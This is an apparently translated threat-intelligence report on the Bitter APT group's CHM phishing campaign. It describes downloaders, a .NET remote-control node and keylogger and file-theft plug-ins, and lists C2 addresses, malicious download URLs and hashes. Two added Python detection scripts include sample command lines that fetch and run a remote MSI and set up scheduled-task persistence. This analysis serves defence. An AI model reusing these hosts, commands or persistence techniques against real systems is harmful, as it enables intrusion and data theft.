2025-01-22 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 06/03 Report
This article explains the CHM file delivery and follow-up operations of the Manlinghua (Bitter) organization.
Overview
BITTER is an APT organization suspected to have a South Asian background. It has long carried out attacks against China, Pakistan and other countries, mainly targeting government, military industry, electric power, nuclear energy and other units to steal sensitive information.
Recently, the Qianxin Threat Intelligence Center found in the course of daily monitoring that the Manlinghua APT organization had begun sending RAR packages containing malicious CHM script files by e-mail, launching targeted attacks against relevant units at home and abroad. Telemetry shows that this kind of attack has been going on for two years; we call it operation magichm.
Tracing the activity back, Manlinghua used an attack chain completely different from its previous attacks: it used a .NET remote control tool as a node to execute commands and distribute plug-ins, and it delivered a new module that had never been disclosed before. The whole attack process is as follows:
Sample analysis
In the first stage, the samples are delivered by mail, and the attachment contains
The built-in malicious script will be executed when Chm is started
It creates a scheduled task that downloads an MSI from a remote server and executes it. In the Sky Rock log we found an interesting phenomenon: the victim opened the malicious file at 16:21, which created the scheduled task; the MSI file was successfully downloaded from the server and executed at 16:52, releasing a payload named dlhost.exe into the c:\intel\logs\ directory.
File name | MD5 | Type
Dlhost.exe | 25a16b0fca9acd71450e02a341064c8d | PE
This sample is the ArtraDownloader commonly used by the Manlinghua organization.
C2: 82.221.136.27, RguhsTmax, RguhsTmax, RguhsT, etc.
However, the Sky engine killed the file as soon as it landed, so no follow-up action was performed. It then took the Manlinghua organization half an hour to replace the payload on the server; only at 17:21 did the victim successfully download a kill-free (detection-evading) Downloader, which we named MuuyDownLoader. Its information is as follows:
File name | MD5 | Type
Otx_live.exe | 6452e2c243db03ecbcacd0419ff8bebf | PE
Creates a "Check" semaphore for mutual exclusion
Checks whether 360 Total Security, Tencent, Kaspersky, etc. are present, and copies itself to
%userprofile%\appdata\roaming\microsoft\windows\sendto under the name winupd.exe
Collects local information
Enters the download process and decrypts the C2. The URLs visited are as follows:
URL | Meaning
OtPefhePbvw/onlinedata1inf.php?data={collected local data} | Send local related information
OtPefhePbvw/datarcvoninfile.php?idata= | Request the payload download; the response returns the payload name
OtPefhePbvw/nnodata3inf.php?inf1= | Check whether the payload is running
OtPefhePbvw/xFiiL33i5sx/%payloadName% | Download the payload if it is not running
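The four beacon endpoints above are distinctive enough to be matched on a web proxy. The following is an added example (not code from the original report or from Qianxin) that maps requested URLs to the MuuyDownLoader stage they belong to and runs over a few constructed proxy log lines; the host c2.example.invalid and the log layout are assumptions, since the real C2 host is decrypted at run time and is not on the page.

```python
from urllib.parse import urlsplit, parse_qs
import re

# Beacon endpoints that the report lists for MuuyDownLoader's download loop.
# Only the URL path is matched; the C2 host is not known from the page.
STAGES = (
    (re.compile(r"/OtPefhePbvw/onlinedata1inf\.php$"), "data", "send host info"),
    (re.compile(r"/OtPefhePbvw/datarcvoninfile\.php$"), "idata", "request payload name"),
    (re.compile(r"/OtPefhePbvw/nnodata3inf\.php$"), "inf1", "check payload running"),
    (re.compile(r"/OtPefhePbvw/xFiiL33i5sx/([^/?]+)$"), None, "download payload"),
)

def classify_url(url):
    """Map a requested URL to (stage, detail), or None if it is not a beacon."""
    parts = urlsplit(url)
    for pattern, param, stage in STAGES:
        m = pattern.search(parts.path)
        if not m:
            continue
        if param is None:
            return stage, m.group(1)          # payload file name taken from the path
        query = parse_qs(parts.query, keep_blank_values=True)
        return stage, (query.get(param) or [""])[0]
    return None

# Constructed sample proxy log: date time client method url status
PROXY_LOG = """\
2021-06-03 16:55:02 10.0.0.12 GET http://c2.example.invalid/OtPefhePbvw/onlinedata1inf.php?data=aG9zdGRhdGE 200
2021-06-03 16:55:03 10.0.0.12 GET http://c2.example.invalid/OtPefhePbvw/datarcvoninfile.php?idata= 200
2021-06-03 16:55:04 10.0.0.12 GET http://c2.example.invalid/OtPefhePbvw/nnodata3inf.php?inf1=msmpenq.exe 200
2021-06-03 16:55:05 10.0.0.12 GET http://c2.example.invalid/OtPefhePbvw/xFiiL33i5sx/msmpenq.exe 200
2021-06-03 16:55:06 10.0.0.13 GET http://www.example.com/index.html 200
"""

def scan_proxy_log(log_text):
    """Return [(client, stage, detail)] for every line whose URL matches a beacon stage."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[2], fields[4]
        result = classify_url(url)
        if result:
            hits.append((client, result[0], result[1]))
    return hits

if __name__ == "__main__":
    for hit in scan_proxy_log(PROXY_LOG):
        print(hit)
```

Seeing the four stages from one client in order, ending with a download from the xFiiL33i5sx directory, is a stronger signal than any single request.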
After a successful download, the payload is stored in the %userprofile%\appdata\roaming\microsoft\windows\sendto directory. The sample information is as follows:
File name | MD5 | Type
Msmpenq.exe | 7cf4ea9df2f2e406fac23d71194c78fd | .NET
The sample is the .NET remote control program commonly used by Bitter.
The C2 is converted to hexadecimal and stored in the configuration file. C2: 45.11.19.170:34318
In previous research on the Bitter organization, we only regarded the .NET remote control as a plug-in of ArtraDownloader, whose main function is to steal victim data.
But in this attack, we found for the first time that the gang used it as a node to distribute plug-ins. All distributed plug-ins are kill-free (detection-evading); their information is as follows:
File name | MD5 | Type | Function
Sysmgr.exe | Ade9a4ee3acbb0e6b42fb57f118dbd6b | VC | File collection module
Scvhost.exe | 578918166854037cdcf1bb3a06a7a4f3 | VC | Keyboard recording module
Winsync.exe | Eb6f0cfb0dff0f[b] 504dc1f060f02adaa | CAB-SFX | Backup module
It is worth mentioning that before distributing a plug-in, the attacker executes cmd commands through the node remote control, for example tasklist | find "Sysmgr", to determine whether the plug-in is already running. After the plug-in is delivered, the schtasks command is used to persist it.
Sysmgr.exe is a kill-free version of the file collection module commonly used by the Bitter organization. In previous Bitter attacks, plug-ins of this type were generally named Lsapip, Lsap, Lsapcr, Lsapc, etc., and were all delivered by ArtraDownloader.
The collected data is then sent to the remote server via POST.
C2:svc2mcxwave.net/UihbywscTZ/45Ugty845nv7rt.php
Scvhost.exe is the keyboard recording module commonly used by the Bitter organization. In previous Bitter attacks, plug-ins of this type were generally named Igfxsrvk, keylogger, etc., and were also delivered by ArtraDownloader.
Winsync.exe is a module that has never been disclosed before; we call it the standby module BackupDownloader. It is packaged as a CAB-SFX, and on execution it releases and runs the appsync.vbs script.
A malicious inf script is then executed through cmstp; the inf script calls PowerShell to download a payload (wdisvcnotifyhost.com/n9brCs21/apprun) from the remote server and finally registers it as a scheduled task for persistence.
We observed that while the core .NET node is running normally, the payload on the remote server always returns 404. When the core node is killed or cleared manually, the attacker uploads a kill-free core node to the remote server; after the core node is revived, the attacker first executes the keylogger module and uses cmd commands to assess the damage.
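The host-side behaviours described above (a scheduled task created from the CHM viewer, tasklist | find "<plug-in>" checks and schtasks persistence from the .NET node, and cmstp running an inf that spawns PowerShell) can be expressed as simple rules over process-creation events. The block below is an added example, not code from the report; the event tuples are constructed, and the paths, task names and the hh.exe parent for the CHM stage are assumptions.

```python
PLUGIN_NAMES = ("Sysmgr", "Scvhost", "Winsync")        # plug-in file names listed in the report
SUSPECT_DIRS = ("\\sendto\\", "\\intel\\logs\\")        # drop directories named in the report

def detect(parent, image, cmdline):
    """Return the list of rule names one process-creation event triggers."""
    hits = []
    par, img, cmd = parent.lower(), image.lower(), cmdline.lower()
    creating_task = "schtasks" in cmd and "/create" in cmd
    # Stage one: a child of the CHM viewer (assumed hh.exe) creating a scheduled task.
    if par == "hh.exe" and creating_task:
        hits.append("chm_schtasks")
    # Persistence pointing at the drop directories, or a task that runs msiexec on a remote package.
    if creating_task and (any(d in cmd for d in SUSPECT_DIRS) or ("msiexec" in cmd and "http" in cmd)):
        hits.append("schtasks_suspect_target")
    # The node remote control checking whether a plug-in is already running.
    if "tasklist" in cmd and "find" in cmd and any(p.lower() in cmd for p in PLUGIN_NAMES):
        hits.append("plugin_running_check")
    # BackupDownloader chain: cmstp given an .inf, then PowerShell spawned by cmstp.
    if img == "cmstp.exe" and ".inf" in cmd:
        hits.append("cmstp_inf")
    if img == "powershell.exe" and par == "cmstp.exe":
        hits.append("powershell_from_cmstp")
    return hits

# Constructed sample events (parent image, image, command line); not telemetry from the report.
EVENTS = [
    ("hh.exe", "cmd.exe", r'cmd.exe /c schtasks /create /sc minute /mo 30 /tn "WinUpdate" /tr "msiexec /i http://host.invalid/wnsetup.msi /q"'),
    ("msmpenq.exe", "cmd.exe", r'cmd.exe /c tasklist | find "Sysmgr"'),
    ("msmpenq.exe", "cmd.exe", r'cmd.exe /c schtasks /create /sc onlogon /tn "SysMgr" /tr "C:\Users\u\AppData\Roaming\Microsoft\Windows\SendTo\Sysmgr.exe"'),
    ("wscript.exe", "cmstp.exe", r"cmstp.exe C:\Users\u\AppData\Local\Temp\appsync.inf"),
    ("cmstp.exe", "powershell.exe", "powershell.exe -c <download of apprun, elided>"),
    ("explorer.exe", "cmd.exe", "cmd.exe /c dir"),
]

def scan(events):
    """Return [(event index, rule)] for every rule any event triggers."""
    return [(i, rule) for i, (p, im, c) in enumerate(events) for rule in detect(p, im, c)]

if __name__ == "__main__":
    for index, rule in scan(EVENTS):
        print(index, rule)
```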
Correlation analysis
Based on Qianxin telemetry data, we found that Bitter APT started sending malicious CHM files by mid-2019 at the latest. The samples captured historically are as follows:
File name | URL
20210225.doc.chm | Http://youxiangxiezhu.com/youxi/crt.php?h=
Suspicious NTC Mail Server Access Logs.chm | Http://sartetextile.com/img/wnsetup.msi
Maritime policy analysis and impact on port security in South Asia.CHM | Http://windiagnosticsvc.net/jscript/jsp.php?h=
SHIPMENT TO PNS INVOICE NO 03021.chm | Http://myprivatehostsvc.com/br/js.php?h=
SOP for Logging out Mail and PCs.chm | Http://myprivatehostsvc.com/xuisy/css.php?h=
Invitation To Roundtable.chm | Http://msisspsvc.net/img/msiwindef.msi
Schedule .chm | Http://w32timeslicesvc.net/jscript/jsp.php?h=
Remote.chm | Http://sartetextile.com/img/wnsetup.msi
MyPictures.jpg.chm | Https://bheragreens.com/img/winsupdater.msi
Annex-Conference .chm | Http://webmailcgwip.com/xingsu/asp.php?h=
...
The MuuyDownLoader used in this incident can be traced back to 2019.
File name | MD5 | ITW
Wupdte | 4bcfb31d0e3df826d3615a41149ebf9c | Http://galluppakistan.com/images/wupdte
Wupd.msi | F38b9ac9d6a1070ac9dbae6f30c1f8aa |
The old version of the sample contains a PDB path:
PDB: C:\Users\user\Desktop\360ActiveDefence 1.4 Sep2019\360ActiveDefence 1.4 V2\Release\360ActiveDefence.pdb
The code structure of the new and old versions is very similar.